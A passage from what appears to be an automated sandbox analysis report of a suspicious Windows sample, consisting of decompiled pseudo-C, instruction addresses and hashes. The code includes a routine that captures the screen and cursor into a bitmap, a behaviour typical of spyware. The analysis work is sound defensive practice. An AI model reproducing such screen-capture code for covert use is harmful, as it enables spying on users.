                                                                                                                                      					_t83 = _t83 + 1;
                                                                                                                                      				} while (_t35 != 0);
                                                                                                                                      				_push(__edi);
                                                                                                                                      				_t105 = _a12;
                                                                                                                                      				_t85 = _t83 - _t101 + 1;
                                                                                                                                      				_v8 = _t85;
                                                                                                                                      				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
                                                                                                                                      					_push(__ebx);
                                                                                                                                      					_push(__esi);
                                                                                                                                      					_t5 = _t105 + 1; // 0x1
                                                                                                                                      					_t78 = _t5 + _t85;
                                                                                                                                      					_t111 = E013145B8(_t85, _t78, 1);
                                                                                                                                      					_pop(_t87);
                                                                                                                                      					__eflags = _t105;
                                                                                                                                      					if(_t105 == 0) {
                                                                                                                                      						L6:
                                                                                                                                      						_push(_v8);
                                                                                                                                      						_t78 = _t78 - _t105;
                                                                                                                                      						_t40 = E0131F2ED(_t87, _t111 + _t105, _t78, _a4);
                                                                                                                                      						_t120 = _t119 + 0x10;
                                                                                                                                      						__eflags = _t40;
                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                      							goto L9;
                                                                                                                                      						} else {
                                                                                                                                      							_t72 = E01318FE5(_a16, __eflags, _t111);
                                                                                                                                      							E01314615(0);
                                                                                                                                      							_t74 = _t72;
                                                                                                                                      							goto L8;
                                                                                                                                      						}
                                                                                                                                      					} else {
                                                                                                                                      						_push(_t105);
                                                                                                                                      						_t75 = E0131F2ED(_t87, _t111, _t78, _a8);
                                                                                                                                      						_t120 = _t119 + 0x10;
                                                                                                                                      						__eflags = _t75;
                                                                                                                                      						if(_t75 != 0) {
                                                                                                                                      							L9:
                                                                                                                                      							_push(0);
                                                                                                                                      							_push(0);
                                                                                                                                      							_push(0);
                                                                                                                                      							_push(0);
                                                                                                                                      							_push(0);
                                                                                                                                      							E013110E6();
                                                                                                                                      							asm("int3");
                                                                                                                                      							_t118 = _t120;
                                                                                                                                      							_t121 = _t120 - 0x150;
                                                                                                                                      							_t43 =  *0x132e00c; // 0x17120af4
                                                                                                                                      							_v48 = _t43 ^ _t118;
                                                                                                                                      							_t88 = _v32;
                                                                                                                                      							_push(_t78);
                                                                                                                                      							_t79 = _v36;
                                                                                                                                      							_push(_t111);
                                                                                                                                      							_t112 = _v332.cAlternateFileName;
                                                                                                                                      							_push(_t105);
                                                                                                                                      							_v372 = _t112;
                                                                                                                                      							while(1) {
                                                                                                                                      								__eflags = _t88 - _t79;
                                                                                                                                      								if(_t88 == _t79) {
                                                                                                                                      									break;
                                                                                                                                      								}
                                                                                                                                      								_t45 =  *_t88;
                                                                                                                                      								__eflags = _t45 - 0x2f;
                                                                                                                                      								if(_t45 != 0x2f) {
                                                                                                                                      									__eflags = _t45 - 0x5c;
                                                                                                                                      									if(_t45 != 0x5c) {
                                                                                                                                      										__eflags = _t45 - 0x3a;
                                                                                                                                      										if(_t45 != 0x3a) {
                                                                                                                                      											_t88 = E0131F7C0(_t79, _t88);
                                                                                                                                      											continue;
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      								break;
                                                                                                                                      							}
                                                                                                                                      							_t102 =  *_t88;
                                                                                                                                      							__eflags = _t102 - 0x3a;
                                                                                                                                      							if(_t102 != 0x3a) {
                                                                                                                                      								L19:
                                                                                                                                      								_t106 = 0;
                                                                                                                                      								__eflags = _t102 - 0x2f;
                                                                                                                                      								if(_t102 == 0x2f) {
                                                                                                                                      									L23:
                                                                                                                                      									_t47 = 1;
                                                                                                                                      									__eflags = 1;
                                                                                                                                      								} else {
                                                                                                                                      									__eflags = _t102 - 0x5c;
                                                                                                                                      									if(_t102 == 0x5c) {
                                                                                                                                      										goto L23;
                                                                                                                                      									} else {
                                                                                                                                      										__eflags = _t102 - 0x3a;
                                                                                                                                      										if(_t102 == 0x3a) {
                                                                                                                                      											goto L23;
                                                                                                                                      										} else {
                                                                                                                                      											_t47 = 0;
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      								_t90 = _t88 - _t79 + 1;
                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                      								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
                                                                                                                                      								E0130C510(_t106,  &_v332, _t106, 0x140);
                                                                                                                                      								_t122 = _t121 + 0xc;
                                                                                                                                      								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
                                                                                                                                      								_t55 = _v336;
                                                                                                                                      								__eflags = _t113 - 0xffffffff;
                                                                                                                                      								if(_t113 != 0xffffffff) {
                                                                                                                                      									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
                                                                                                                                      									__eflags = _t92;
                                                                                                                                      									_t93 = _t92 >> 2;
                                                                                                                                      									_v344 = _t92 >> 2;
                                                                                                                                      									do {
                                                                                                                                      										__eflags = _v332.cFileName - 0x2e;
                                                                                                                                      										if(_v332.cFileName != 0x2e) {
                                                                                                                                      											L36:
                                                                                                                                      											_push(_t55);
                                                                                                                                      											_t57 = E01318DA6(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
                                                                                                                                      											_t122 = _t122 + 0x10;
                                                                                                                                      											__eflags = _t57;
                                                                                                                                      											if(_t57 != 0) {
                                                                                                                                      												goto L26;
                                                                                                                                      											} else {
                                                                                                                                      												goto L37;
                                                                                                                                      											}
                                                                                                                                      										} else {
                                                                                                                                      											_t93 = _v287;
                                                                                                                                      											__eflags = _t93;
                                                                                                                                      											if(_t93 == 0) {
                                                                                                                                      												goto L37;
                                                                                                                                      											} else {
                                                                                                                                      												__eflags = _t93 - 0x2e;
                                                                                                                                      												if(_t93 != 0x2e) {
                                                                                                                                      													goto L36;
                                                                                                                                      												} else {
                                                                                                                                      													__eflags = _v286;
                                                                                                                                      													if(_v286 == 0) {
                                                                                                                                      														goto L37;
                                                                                                                                      													} else {
                                                                                                                                      														goto L36;
                                                                                                                                      													}
                                                                                                                                      												}
                                                                                                                                      											}
                                                                                                                                      										}
                                                                                                                                      										goto L40;
                                                                                                                                      										L37:
                                                                                                                                      										_t62 = FindNextFileA(_t113,  &_v332);
                                                                                                                                      										__eflags = _t62;
                                                                                                                                      										_t55 = _v336;
                                                                                                                                      									} while (_t62 != 0);
                                                                                                                                      									_t103 =  *_t55;
                                                                                                                                      									_t96 = _v344;
                                                                                                                                      									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
                                                                                                                                      									__eflags = _t96 - _t65;
                                                                                                                                      									if(_t96 != _t65) {
                                                                                                                                      										E0131F3E0(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E01318BFE);
                                                                                                                                      									}
                                                                                                                                      								} else {
                                                                                                                                      									_push(_t55);
                                                                                                                                      									_t57 = E01318DA6(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
                                                                                                                                      									L26:
                                                                                                                                      									_t106 = _t57;
                                                                                                                                      								}
                                                                                                                                      								__eflags = _t113 - 0xffffffff;
                                                                                                                                      								if(_t113 != 0xffffffff) {
                                                                                                                                      									FindClose(_t113);
                                                                                                                                      								}
                                                                                                                                      							} else {
                                                                                                                                      								__eflags = _t88 -  &(_t79[1]);
                                                                                                                                      								if(_t88 ==  &(_t79[1])) {
                                                                                                                                      									goto L19;
                                                                                                                                      								} else {
                                                                                                                                      									_push(_t112);
                                                                                                                                      									E01318DA6(_t79, _t88, 0, _t112, _t79, 0, 0);
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      							__eflags = _v12 ^ _t118;
                                                                                                                                      							return E0130A07B(_v12 ^ _t118);
                                                                                                                                      						} else {
                                                                                                                                      							goto L6;
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      				} else {
                                                                                                                                      					_t74 = 0xc;
                                                                                                                                      					L8:
                                                                                                                                      					return _t74;
                                                                                                                                      				}
                                                                                                                                      				L40:
                                                                                                                                      			}















































                                                                                                                                      0x01318dab
                                                                                                                                      0x01318dac
                                                                                                                                      0x01318daf
                                                                                                                                      0x01318daf
                                                                                                                                      0x01318db2
                                                                                                                                      0x01318db2
                                                                                                                                      0x01318db4
                                                                                                                                      0x01318db5
                                                                                                                                      0x01318dbe
                                                                                                                                      0x01318dbf
                                                                                                                                      0x01318dc2
                                                                                                                                      0x01318dc5
                                                                                                                                      0x01318dca
                                                                                                                                      0x01318dd1
                                                                                                                                      0x01318dd2
                                                                                                                                      0x01318dd3
                                                                                                                                      0x01318dd6
                                                                                                                                      0x01318de0
                                                                                                                                      0x01318de3
                                                                                                                                      0x01318de4
                                                                                                                                      0x01318de6
                                                                                                                                      0x01318dfa
                                                                                                                                      0x01318dfa
                                                                                                                                      0x01318dfd
                                                                                                                                      0x01318e07
                                                                                                                                      0x01318e0c
                                                                                                                                      0x01318e0f
                                                                                                                                      0x01318e11
                                                                                                                                      0x00000000
                                                                                                                                      0x01318e13
                                                                                                                                      0x01318e17
                                                                                                                                      0x01318e20
                                                                                                                                      0x01318e26
                                                                                                                                      0x00000000
                                                                                                                                      0x01318e29
                                                                                                                                      0x01318de8
                                                                                                                                      0x01318de8
                                                                                                                                      0x01318dee
                                                                                                                                      0x01318df3
                                                                                                                                      0x01318df6
                                                                                                                                      0x01318df8
                                                                                                                                      0x01318e2f
                                                                                                                                      0x01318e31
                                                                                                                                      0x01318e32
                                                                                                                                      0x01318e33
                                                                                                                                      0x01318e34
                                                                                                                                      0x01318e35
                                                                                                                                      0x01318e36
                                                                                                                                      0x01318e3b
                                                                                                                                      0x01318e3f
                                                                                                                                      0x01318e41
                                                                                                                                      0x01318e47
                                                                                                                                      0x01318e4e
                                                                                                                                      0x01318e51
                                                                                                                                      0x01318e54
                                                                                                                                      0x01318e55
                                                                                                                                      0x01318e58
                                                                                                                                      0x01318e59
                                                                                                                                      0x01318e5c
                                                                                                                                      0x01318e5d
                                                                                                                                      0x01318e7e
                                                                                                                                      0x01318e7e
                                                                                                                                      0x01318e80
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01318e65
                                                                                                                                      0x01318e67
                                                                                                                                      0x01318e69
                                                                                                                                      0x01318e6b
                                                                                                                                      0x01318e6d
                                                                                                                                      0x01318e6f
                                                                                                                                      0x01318e71
                                                                                                                                      0x01318e7c
                                                                                                                                      0x00000000
                                                                                                                                      0x01318e7c
                                                                                                                                      0x01318e71
                                                                                                                                      0x01318e6d
                                                                                                                                      0x00000000
                                                                                                                                      0x01318e69
                                                                                                                                      0x01318e82
                                                                                                                                      0x01318e84
                                                                                                                                      0x01318e87
                                                                                                                                      0x01318ea0
                                                                                                                                      0x01318ea0
                                                                                                                                      0x01318ea2
                                                                                                                                      0x01318ea5
                                                                                                                                      0x01318eb5
                                                                                                                                      0x01318eb7
                                                                                                                                      0x01318eb7
                                                                                                                                      0x01318ea7
                                                                                                                                      0x01318ea7
                                                                                                                                      0x01318eaa
                                                                                                                                      0x00000000
                                                                                                                                      0x01318eac
                                                                                                                                      0x01318eac
                                                                                                                                      0x01318eaf
                                                                                                                                      0x00000000
                                                                                                                                      0x01318eb1
                                                                                                                                      0x01318eb1
                                                                                                                                      0x01318eb1
                                                                                                                                      0x01318eaf
                                                                                                                                      0x01318eaa
                                                                                                                                      0x01318ebd
                                                                                                                                      0x01318ec5
                                                                                                                                      0x01318ec9
                                                                                                                                      0x01318ed7
                                                                                                                                      0x01318edc
                                                                                                                                      0x01318ef1
                                                                                                                                      0x01318ef3
                                                                                                                                      0x01318ef9
                                                                                                                                      0x01318efc
                                                                                                                                      0x01318f2e
                                                                                                                                      0x01318f2e
                                                                                                                                      0x01318f30
                                                                                                                                      0x01318f33
                                                                                                                                      0x01318f39
                                                                                                                                      0x01318f39
                                                                                                                                      0x01318f40
                                                                                                                                      0x01318f5a
                                                                                                                                      0x01318f5a
                                                                                                                                      0x01318f69
                                                                                                                                      0x01318f6e
                                                                                                                                      0x01318f71
                                                                                                                                      0x01318f73
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01318f42
                                                                                                                                      0x01318f42
                                                                                                                                      0x01318f48
                                                                                                                                      0x01318f4a
                                                                                                                                      0x00000000
                                                                                                                                      0x01318f4c
                                                                                                                                      0x01318f4c
                                                                                                                                      0x01318f4f
                                                                                                                                      0x00000000
                                                                                                                                      0x01318f51
                                                                                                                                      0x01318f51
                                                                                                                                      0x01318f58
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01318f58
                                                                                                                                      0x01318f4f
                                                                                                                                      0x01318f4a
                                                                                                                                      0x00000000
                                                                                                                                      0x01318f75
                                                                                                                                      0x01318f7d
                                                                                                                                      0x01318f83
                                                                                                                                      0x01318f85
                                                                                                                                      0x01318f85
                                                                                                                                      0x01318f8d
                                                                                                                                      0x01318f92
                                                                                                                                      0x01318f9a
                                                                                                                                      0x01318f9d
                                                                                                                                      0x01318f9f
                                                                                                                                      0x01318fb3
                                                                                                                                      0x01318fb8
                                                                                                                                      0x01318efe
                                                                                                                                      0x01318efe
                                                                                                                                      0x01318f02
                                                                                                                                      0x01318f0a
                                                                                                                                      0x01318f0a
                                                                                                                                      0x01318f0a
                                                                                                                                      0x01318f0c
                                                                                                                                      0x01318f0f
                                                                                                                                      0x01318f12
                                                                                                                                      0x01318f12
                                                                                                                                      0x01318e89
                                                                                                                                      0x01318e8c
                                                                                                                                      0x01318e8e
                                                                                                                                      0x00000000
                                                                                                                                      0x01318e90
                                                                                                                                      0x01318e90
                                                                                                                                      0x01318e96
                                                                                                                                      0x01318e9b
                                                                                                                                      0x01318e8e
                                                                                                                                      0x01318f1f
                                                                                                                                      0x01318f2a
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01318df8
                                                                                                                                      0x01318dcc
                                                                                                                                      0x01318dce
                                                                                                                                      0x01318e2a
                                                                                                                                      0x01318e2e
                                                                                                                                      0x01318e2e
                                                                                                                                      0x00000000

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .
                                                                                                                                      • API String ID: 0-248832578
                                                                                                                                      • Opcode ID: b8a143c04d0d0289e6afc692350b6d3ba35f067b40935b3c15b42a434b30db3e
                                                                                                                                      • Instruction ID: c96e1aea00d85c72e3ff0852bf30294c5bdeee25b0a886384afac6147f442d90
                                                                                                                                      • Opcode Fuzzy Hash: b8a143c04d0d0289e6afc692350b6d3ba35f067b40935b3c15b42a434b30db3e
                                                                                                                                      • Instruction Fuzzy Hash: 5F310871900209AFDB299E7CCC84EFB7BBDEB85318F1441ECF919D7255E6309A458B60
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0131A16C() {
                                                                                                                                      				signed int _t3;
                                                                                                                                      
                                                                                                                                      				_t3 = GetProcessHeap();
                                                                                                                                      				 *0x132f578 = _t3;
                                                                                                                                      				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                                                                                                                      			}




                                                                                                                                      0x0131a16c
                                                                                                                                      0x0131a174
                                                                                                                                      0x0131a17c

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HeapProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                      • Opcode ID: 72d7bc95de37a72fffbf47715e60909e44da0d50ab7405e107afa2df40d52799
                                                                                                                                      • Instruction ID: ded2bf5169d53c2d3944dc3d2584fbe1487a8f8edc957c8a076366f075949c64
                                                                                                                                      • Opcode Fuzzy Hash: 72d7bc95de37a72fffbf47715e60909e44da0d50ab7405e107afa2df40d52799
                                                                                                                                      • Instruction Fuzzy Hash: EFA00170A01201CBE770AE35AA496197AADAA457D2B2581ADE509C6198EA3884909B01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                      			E01306561(intOrPtr __ecx, signed int __edx, void* __eflags) {
                                                                                                                                      				void* __esi;
                                                                                                                                      				struct HDC__* _t101;
                                                                                                                                      				void* _t102;
                                                                                                                                      				int _t103;
                                                                                                                                      				void* _t104;
                                                                                                                                      				void* _t105;
                                                                                                                                      				void* _t108;
                                                                                                                                      				int _t115;
                                                                                                                                      				void* _t116;
                                                                                                                                      				signed int _t119;
                                                                                                                                      				signed int _t121;
                                                                                                                                      				void* _t123;
                                                                                                                                      				long _t133;
                                                                                                                                      				void* _t134;
                                                                                                                                      				int _t136;
                                                                                                                                      				void* _t174;
                                                                                                                                      				void* _t176;
                                                                                                                                      				intOrPtr _t183;
                                                                                                                                      				intOrPtr _t185;
                                                                                                                                      				intOrPtr _t186;
                                                                                                                                      				intOrPtr _t187;
                                                                                                                                      				int _t188;
                                                                                                                                      				intOrPtr _t189;
                                                                                                                                      				int _t193;
                                                                                                                                      				signed char _t194;
                                                                                                                                      				signed short _t211;
                                                                                                                                      				signed int _t215;
                                                                                                                                      				struct HDC__* _t217;
                                                                                                                                      				signed short _t219;
                                                                                                                                      				struct HDC__* _t221;
                                                                                                                                      				struct HDC__* _t226;
                                                                                                                                      				struct tagBITMAPINFO* _t229;
                                                                                                                                      				void* _t230;
                                                                                                                                      				int _t237;
                                                                                                                                      				void* _t239;
                                                                                                                                      
                                                                                                                                      				_t212 = __edx;
                                                                                                                                      				_t185 = __ecx;
                                                                                                                                      				E01323174(E013236A5, __edx, __eflags);
                                                                                                                                      				 *(_t239 - 0x11) = _t212;
                                                                                                                                      				_t183 = _t185;
                                                                                                                                      				 *((intOrPtr*)(_t239 - 0x84)) = _t183;
                                                                                                                                      				_t226 = CreateDCA("DISPLAY", 0, 0, 0);
                                                                                                                                      				 *(_t239 - 0x1c) = _t226;
                                                                                                                                      				_t101 = CreateCompatibleDC(_t226);
                                                                                                                                      				_t186 =  *0x132f7d0; // 0x10001
                                                                                                                                      				_t217 = _t101;
                                                                                                                                      				 *(_t239 - 0x20) = _t217;
                                                                                                                                      				_t102 = E01306D93(_t186);
                                                                                                                                      				_t187 =  *0x132f7d0; // 0x10001
                                                                                                                                      				 *(_t239 - 0x18) = _t102;
                                                                                                                                      				_t103 = E01306DDB(_t187);
                                                                                                                                      				_t188 =  *(_t239 - 0x18);
                                                                                                                                      				 *(_t239 - 0x24) = _t103;
                                                                                                                                      				if(_t188 != 0 || _t103 != 0) {
                                                                                                                                      					_t104 = CreateCompatibleBitmap(_t226, _t188, _t103);
                                                                                                                                      					 *(_t239 - 0x10) = _t104;
                                                                                                                                      					__eflags = _t104;
                                                                                                                                      					if(_t104 != 0) {
                                                                                                                                      						_t105 = SelectObject(_t217, _t104);
                                                                                                                                      						__eflags = _t105;
                                                                                                                                      						if(_t105 != 0) {
                                                                                                                                      							_t189 =  *0x132f7d0; // 0x10001
                                                                                                                                      							_t212 = _t239 - 0x2c;
                                                                                                                                      							asm("xorps xmm0, xmm0");
                                                                                                                                      							asm("movlpd [ebp-0x2c], xmm0");
                                                                                                                                      							E01306E1A(_t189, _t239 - 0x2c);
                                                                                                                                      							_t108 = StretchBlt(_t217, 0, 0,  *(_t239 - 0x18),  *(_t239 - 0x24), _t226,  *(_t239 - 0x2c),  *(_t239 - 0x28),  *(_t239 - 0x18),  *(_t239 - 0x24), 0xcc0020);
                                                                                                                                      							__eflags = _t108;
                                                                                                                                      							if(_t108 == 0) {
                                                                                                                                      								goto L7;
                                                                                                                                      							}
                                                                                                                                      							__eflags =  *(_t239 - 0x11);
                                                                                                                                      							if( *(_t239 - 0x11) != 0) {
                                                                                                                                      								 *(_t239 - 0x68) = 0x14;
                                                                                                                                      								_t174 = GetCursorInfo(_t239 - 0x68);
                                                                                                                                      								__eflags = _t174;
                                                                                                                                      								if(_t174 != 0) {
                                                                                                                                      									_t176 = GetIconInfo( *(_t239 - 0x60), _t239 - 0x98);
                                                                                                                                      									__eflags = _t176;
                                                                                                                                      									if(_t176 != 0) {
                                                                                                                                      										_t237 =  *((intOrPtr*)(_t239 - 0x58)) -  *((intOrPtr*)(_t239 - 0x90)) -  *(_t239 - 0x28);
                                                                                                                                      										__eflags = _t237;
                                                                                                                                      										DeleteObject( *(_t239 - 0x88));
                                                                                                                                      										DeleteObject( *(_t239 - 0x8c));
                                                                                                                                      										_t217 =  *(_t239 - 0x20);
                                                                                                                                      										DrawIcon(_t217,  *((intOrPtr*)(_t239 - 0x5c)) -  *((intOrPtr*)(_t239 - 0x94)) -  *(_t239 - 0x2c), _t237,  *(_t239 - 0x60));
                                                                                                                                      										_t226 =  *(_t239 - 0x1c);
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      							_push(_t239 - 0x80);
                                                                                                                                      							_t115 = 0x18;
                                                                                                                                      							_t116 = GetObjectW( *(_t239 - 0x10), _t115, ??);
                                                                                                                                      							__eflags = _t116;
                                                                                                                                      							if(_t116 == 0) {
                                                                                                                                      								goto L7;
                                                                                                                                      							} else {
                                                                                                                                      								_t119 =  *(_t239 - 0x6e) *  *(_t239 - 0x70) & 0x0000ffff;
                                                                                                                                      								__eflags = _t119 - 1;
                                                                                                                                      								if(_t119 != 1) {
                                                                                                                                      									_t219 = 4;
                                                                                                                                      									__eflags = _t119 - _t219;
                                                                                                                                      									if(_t119 <= _t219) {
                                                                                                                                      										L23:
                                                                                                                                      										_t193 = _t219 & 0x0000ffff;
                                                                                                                                      										_t121 = 1 << _t193;
                                                                                                                                      										__eflags = _t121;
                                                                                                                                      										 *(_t239 - 0x24) = _t193;
                                                                                                                                      										_t123 = LocalAlloc(0x40, 0x28 + _t121 * 4);
                                                                                                                                      										_t194 =  *(_t239 - 0x24);
                                                                                                                                      										_t215 = 0x18;
                                                                                                                                      										L24:
                                                                                                                                      										_t229 = _t123;
                                                                                                                                      										_t229->bmiHeader = 0x28;
                                                                                                                                      										_t229->bmiHeader.biWidth =  *(_t239 - 0x7c);
                                                                                                                                      										_t229->bmiHeader.biHeight =  *(_t239 - 0x78);
                                                                                                                                      										_t229->bmiHeader.biPlanes =  *(_t239 - 0x70);
                                                                                                                                      										_t229->bmiHeader.biBitCount =  *(_t239 - 0x6e);
                                                                                                                                      										__eflags = _t219 - _t215;
                                                                                                                                      										if(_t219 < _t215) {
                                                                                                                                      											__eflags = 1;
                                                                                                                                      											_t229->bmiHeader.biClrUsed = 1 << _t194;
                                                                                                                                      										}
                                                                                                                                      										_t229->bmiHeader.biCompression = _t229->bmiHeader.biCompression & 0x00000000;
                                                                                                                                      										asm("cdq");
                                                                                                                                      										_t212 = _t215 & 0x00000007;
                                                                                                                                      										_t229->bmiHeader.biClrImportant = 0;
                                                                                                                                      										_t133 = (_t229->bmiHeader.biWidth + 7 + (_t215 & 0x00000007) >> 3) * (_t219 & 0x0000ffff) * _t229->bmiHeader.biHeight;
                                                                                                                                      										_t229->bmiHeader.biSizeImage = _t133;
                                                                                                                                      										_t134 = GlobalAlloc(0, _t133);
                                                                                                                                      										 *(_t239 - 0x18) = _t134;
                                                                                                                                      										__eflags = _t134;
                                                                                                                                      										if(_t134 != 0) {
                                                                                                                                      											_t221 =  *(_t239 - 0x20);
                                                                                                                                      											_t136 = GetDIBits(_t221,  *(_t239 - 0x10), 0, _t229->bmiHeader.biHeight & 0x0000ffff, _t134, _t229, 0);
                                                                                                                                      											__eflags = _t136;
                                                                                                                                      											if(_t136 != 0) {
                                                                                                                                      												 *((short*)(_t239 - 0x3c)) = 0x4d42;
                                                                                                                                      												 *((intOrPtr*)(_t239 - 0x3a)) = _t229->bmiHeader + _t229->bmiHeader.biSizeImage + _t229->bmiHeader.biClrUsed * 4 + 0xe;
                                                                                                                                      												 *((intOrPtr*)(_t239 - 0x36)) = 0;
                                                                                                                                      												 *((intOrPtr*)(_t239 - 0x32)) = _t229->bmiHeader + _t229->bmiHeader.biClrUsed * 4 + 0xe;
                                                                                                                                      												E0130295B(_t239 - 0x54);
                                                                                                                                      												_t75 = _t239 - 4;
                                                                                                                                      												 *_t75 =  *(_t239 - 4) & 0x00000000;
                                                                                                                                      												__eflags =  *_t75;
                                                                                                                                      												E0130295B(_t239 - 0xb0);
                                                                                                                                      												 *(_t239 - 4) = 1;
                                                                                                                                      												E01302E1D(_t239 - 0x54, _t229, _t239 - 0x3c, 0xe);
                                                                                                                                      												E0130287D(_t239 - 0xb0, __eflags, _t239 - 0x54);
                                                                                                                                      												E01302E1D(_t239 - 0x54, _t229, _t229, 0x28);
                                                                                                                                      												E0130287D(_t239 - 0xb0, __eflags, _t239 - 0x54);
                                                                                                                                      												_t230 =  *(_t239 - 0x18);
                                                                                                                                      												E01302E1D(_t239 - 0x54, _t230, _t230, _t229->bmiHeader.biSizeImage);
                                                                                                                                      												E0130287D(_t239 - 0xb0, __eflags, _t239 - 0x54);
                                                                                                                                      												DeleteObject( *(_t239 - 0x10));
                                                                                                                                      												GlobalFree(_t230);
                                                                                                                                      												DeleteDC( *(_t239 - 0x1c));
                                                                                                                                      												DeleteDC(_t221);
                                                                                                                                      												E013028EC(_t183, _t239 - 0xb0);
                                                                                                                                      												E013028AF(_t239 - 0xb0, _t212, __eflags);
                                                                                                                                      												E013028AF(_t239 - 0x54, _t212, __eflags);
                                                                                                                                      												goto L31;
                                                                                                                                      											}
                                                                                                                                      											DeleteDC( *(_t239 - 0x1c));
                                                                                                                                      											DeleteDC(_t221);
                                                                                                                                      											DeleteObject( *(_t239 - 0x10));
                                                                                                                                      											GlobalFree( *(_t239 - 0x18));
                                                                                                                                      											goto L2;
                                                                                                                                      										} else {
                                                                                                                                      											DeleteDC( *(_t239 - 0x1c));
                                                                                                                                      											_t217 =  *(_t239 - 0x20);
                                                                                                                                      											L8:
                                                                                                                                      											DeleteDC(_t217);
                                                                                                                                      											DeleteObject( *(_t239 - 0x10));
                                                                                                                                      											goto L5;
                                                                                                                                      										}
                                                                                                                                      									}
                                                                                                                                      									_t219 = 8;
                                                                                                                                      									__eflags = _t119 - _t219;
                                                                                                                                      									if(_t119 <= _t219) {
                                                                                                                                      										goto L23;
                                                                                                                                      									}
                                                                                                                                      									_t219 = 0x10;
                                                                                                                                      									__eflags = _t119 - _t219;
                                                                                                                                      									if(_t119 <= _t219) {
                                                                                                                                      										goto L23;
                                                                                                                                      									}
                                                                                                                                      									_t211 = 0x18;
                                                                                                                                      									__eflags = _t119 - _t211;
                                                                                                                                      									if(_t119 > _t211) {
                                                                                                                                      										_t219 = 0x20;
                                                                                                                                      										goto L23;
                                                                                                                                      									}
                                                                                                                                      									_t219 = _t211;
                                                                                                                                      									_t123 = LocalAlloc(0x40, 0x28);
                                                                                                                                      									_t215 = _t219;
                                                                                                                                      									_t194 = _t215;
                                                                                                                                      									goto L24;
                                                                                                                                      								}
                                                                                                                                      								_t219 = 1;
                                                                                                                                      								goto L23;
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      						L7:
                                                                                                                                      						DeleteDC(_t226);
                                                                                                                                      						goto L8;
                                                                                                                                      					} else {
                                                                                                                                      						DeleteDC(_t226);
                                                                                                                                      						DeleteDC(_t217);
                                                                                                                                      						DeleteObject(0);
                                                                                                                                      						L5:
                                                                                                                                      						goto L2;
                                                                                                                                      					}
                                                                                                                                      				} else {
                                                                                                                                      					L2:
                                                                                                                                      					E01302917(_t183, _t212, 0x132a36c);
                                                                                                                                      					L31:
                                                                                                                                      					 *[fs:0x0] =  *((intOrPtr*)(_t239 - 0xc));
                                                                                                                                      					return _t183;
                                                                                                                                      				}
                                                                                                                                      			}






































                                                                                                                                      0x01306561
                                                                                                                                      0x01306561
                                                                                                                                      0x01306566
                                                                                                                                      0x01306576
                                                                                                                                      0x0130657c
                                                                                                                                      0x01306583
                                                                                                                                      0x0130658f
                                                                                                                                      0x01306592
                                                                                                                                      0x01306595
                                                                                                                                      0x0130659b
                                                                                                                                      0x013065a1
                                                                                                                                      0x013065a3
                                                                                                                                      0x013065a6
                                                                                                                                      0x013065ab
                                                                                                                                      0x013065b1
                                                                                                                                      0x013065b4
                                                                                                                                      0x013065b9
                                                                                                                                      0x013065bc
